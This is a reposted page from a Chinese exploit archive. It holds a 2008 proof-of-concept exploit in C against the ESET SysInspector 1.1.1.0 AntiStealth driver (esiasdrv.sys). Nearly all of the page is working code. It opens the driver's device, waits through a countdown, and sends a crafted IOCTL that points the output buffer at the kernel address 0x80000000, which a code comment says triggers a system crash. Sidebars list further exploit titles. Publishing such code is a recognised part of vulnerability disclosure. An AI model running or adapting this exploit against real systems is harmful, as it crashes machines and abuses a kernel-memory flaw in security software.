首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ESET SysInspector - 1.1.1.0 (esiadrv.sys) Proof of Concept Exploit
来源:http://www.ntinternals.org/ 作者:alex 发布时间:2008-10-03  
////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | ESET, LLC. - http://www.eset.com/                                          | //
// |                                                                            | //
// | Affected Software:                                                         | //
// | ESET System Analyzer Tool - 1.1.1.0                                        | //
// |                                                                            | //
// | Affected Driver:                                                           | //
// | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys          | //
// | Proof of Concept Exploit                                                   | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | NT Internals - http://www.ntinternals.org/                                 | //
// | alex ntinternals org                                                       | //
// | 01 October 2008                                                            | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003

#define IOCTL_METHOD_NEIGHTER 0x00223C1F
#define BUFFER_LENGTH 0x04

typedef ULONG NTSTATUS;

typedef struct _UNICODE_STRING
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PWSTR Buffer;
    /* 0x08 */
}
    UNICODE_STRING,
  *PUNICODE_STRING,
**PPUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES
{
    /* 0x00 */ ULONG Length;
    /* 0x04 */ HANDLE RootDirectory;
    /* 0x08 */ PUNICODE_STRING ObjectName;
    /* 0x0C */ ULONG Attributes;
    /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
    /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
    /* 0x18 */
}
    OBJECT_ATTRIBUTES,
  *POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;

typedef struct _IO_STATUS_BLOCK
{
    union
    {
        /* 0x00 */ NTSTATUS Status;
        /* 0x00 */ PVOID Pointer;
    };

    /* 0x04 */ ULONG Information;
    /* 0x08 */
}
    IO_STATUS_BLOCK,
  *PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;

typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);

IMP_VOID RtlInitUnicodeString
(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

IMP_SYSCALL NtCreateFile
(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
);

IMP_SYSCALL NtDeviceIoControlFile
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength
);

IMP_SYSCALL NtDelayExecution
(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER Interval
);

IMP_SYSCALL NtClose
(
    IN HANDLE Handle
);

int __cdecl main(int argc, char **argv)
{
    NTSTATUS NtStatus;
   
    HANDLE DeviceHandle;
    ULONG InputBuffer;

    UNICODE_STRING DeviceName;
    OBJECT_ATTRIBUTES ObjectAttributes;
    IO_STATUS_BLOCK IoStatusBlock;
    LARGE_INTEGER Interval;
   
    ///////////////////////////////////////////////////////////////////////////////////////////////
   
    system("cls");
   
    printf( " +----------------------------------------------------------------------------+\n"
            " |                                                                            |\n"
            " | ESET, LLC. - http://www.eset.com/                                          |\n"
            " |                                                                            |\n"
            " | Affected Software:                                                         |\n"
            " | ESET System Analyzer Tool - 1.1.1.0                                        |\n"
            " |                                                                            |\n"
            " | Affected Driver:                                                           |\n"
            " | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys          |\n"
            " | Proof of Concept Exploit                                                   |\n"
            " |                                                                            |\n"
            " +----------------------------------------------------------------------------+\n"
            " |                                                                            |\n"
            " | NT Internals - http://www.ntinternals.org/                                 |\n"
            " | alex ntinternals org                                                       |\n"
            " | 01 October 2008                                                            |\n"
            " |                                                                            |\n"
            " +----------------------------------------------------------------------------+\n\n");
   
    ///////////////////////////////////////////////////////////////////////////////////////////////
   
    RtlInitUnicodeString(&DeviceName, L"\\Device\\esiasdrv");

    ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
    ObjectAttributes.RootDirectory = 0;
    ObjectAttributes.ObjectName = &DeviceName;
    ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
    ObjectAttributes.SecurityDescriptor = NULL;
    ObjectAttributes.SecurityQualityOfService = NULL;

  
    NtStatus = NtCreateFile(
                            &DeviceHandle,                      // FileHandle
                            FILE_READ_DATA | FILE_WRITE_DATA,   // DesiredAccess
                            &ObjectAttributes,                  // ObjectAttributes
                            &IoStatusBlock,                     // IoStatusBlock
                            NULL,                               // AllocationSize OPTIONAL
                            0,                                  // FileAttributes
                            FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
                            FILE_OPEN_IF,                       // CreateDisposition
                            0,                                  // CreateOptions
                            NULL,                               // EaBuffer OPTIONAL
                            0);                                 // EaLength

    /*
    if(NtStatus)
    {
        printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }
    */
   
    Interval.LowPart = 0xFF676980;
    Interval.HighPart = 0xFFFFFFFF;

    printf("\n 3");
    NtDelayExecution(FALSE, &Interval);
   
    printf(" 2");
    NtDelayExecution(FALSE, &Interval);

    printf(" 1");
    NtDelayExecution(FALSE, &Interval);

    printf(" Upss\n\n");
    NtDelayExecution(FALSE, &Interval);


    //
    // Choose type of BSoD
    //

    // InputBuffer = 0x12345678;
   
    InputBuffer = 0;


    NtStatus = NtDeviceIoControlFile(
                                    DeviceHandle,          // FileHandle
                                    NULL,                  // Event
                                    NULL,                  // ApcRoutine
                                    NULL,                  // ApcContext
                                    &IoStatusBlock,        // IoStatusBlock
                                    IOCTL_METHOD_NEIGHTER, // FsControlCode
                                    &InputBuffer,          // InputBuffer
                                    BUFFER_LENGTH,         // InputBufferLength
                                    (PVOID)0x80000000,     // OutputBuffer
                                    BUFFER_LENGTH);        // OutBufferLength
   
    if(NtStatus)
    {
        printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);
        return NtStatus;
    }
   
    NtStatus = NtClose(DeviceHandle); // Handle
   
    if(NtStatus)
    {
        printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    return FALSE;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpScheduleIt <= 1.2.10 (reser
·mIRC 6.34 Remote Buffer Overfl
·MySQL Quick Admin <= 1.5.5 (CO
·OpenX 2.6 (ac.php bannerid) Re
·ADN Forum <= 1.0b Blind SQL In
·SG Real Estate Portal 2.0 Blin
·IP Reg <= 0.4 Remote Blind SQL
·GdPicture Pro ActiveX (gdpictu
·Serv-U 7.2.0.1 (stou con:1) De
·Autodesk DWF Viewer Control /
·Serv-U 7.2.0.1 Remote FTP File
·PhpCms2007 sp6 SQL injection 0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved